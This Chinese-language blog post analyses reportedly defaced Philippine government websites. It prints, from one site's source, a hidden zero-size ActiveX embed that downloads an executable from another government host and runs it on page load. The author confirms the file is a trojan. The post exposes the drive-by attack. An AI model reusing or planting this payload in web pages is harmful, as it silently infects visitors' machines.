也看菲律宾官网被黑

今天在QQ群里发现有人传http://www.pei.net.ph/和http://lamITan.gov.ph/  两个菲律宾官网被黑了,被挂上了中国国旗。首先,第一感觉,看到了很振奋。于是对Jason.Mr.X这个所谓的大牛膜拜之情由然而升。于是从网上查询他的信息,发现该消息已于是好几天前的旧闻了。

于是疑问顿生,虽然菲律宾国家本身很落后,不过一个国家的官方站点被黑了进一个星期左右都没被改过来,显然这有点说不通。接着ping了下这两个站点,通过得出的公网地址查询,发现http://lamITan.gov.ph/这个站点的公网IP显示的竟然是美国。一个国家政府的站点在别外一个国家架设,有点不和情理啊。

通过分析http://lamITan.gov.ph/这个站点的源代码,发现了这样一段代码。

<BODY><OBJECT ID="*ActiveX1" WIDTH="0" HEIGHT="0" CLASSID="CLSID:c1b7e532-3ecb-4e9e-bb3a-2951ffe67c61" CODEBASE="*ActiveX.cab#Version=1,0,0,1"><PARAM NAME="propProgressbackground" VALUE="#bccee8"><PARAM NAME="propTextbackground" VALUE="#f7f8fc"><PARAM NAME="propBarColor" VALUE="#df0203"><PARAM NAME="propTextColor" VALUE="#000000"><PARAM NAME="propWidth" VALUE="0"><PARAM NAME="propHeight" VALUE="0"><PARAM NAME="propDownloadUrl" VALUE="http://www.sulu.gov.ph/admin/cal/135pk.exe"><PARAM NAME="propPostdownloadAction" VALUE="run"><PARAM NAME="propInstallCompleteUrl" VALUE=""><PARAM NAME="propbrowserRedirectUrl" VALUE=""><PARAM NAME="propVerbose" VALUE="0"><PARAM NAME="propInterrupt" VALUE="0"></OBJECT></script></body></html>

显然这是一段网马信息,下载http://www.sulu.gov.ph/admin/cal/135pk.exe这个文件,通过杀软查询,确实是这是一个木马无疑。而我在通过360浏览器下载时,就有云安全提示是木马文件。

 




本站的发展离不开您的资助,金额随意,欢迎来赏!

You can donate through PayPal.
My paypal id: itybku@139.com
Paypal page: https://www.paypal.me/361way

分类: 安全/漏洞 标签:
  1. 本文目前尚无任何评论.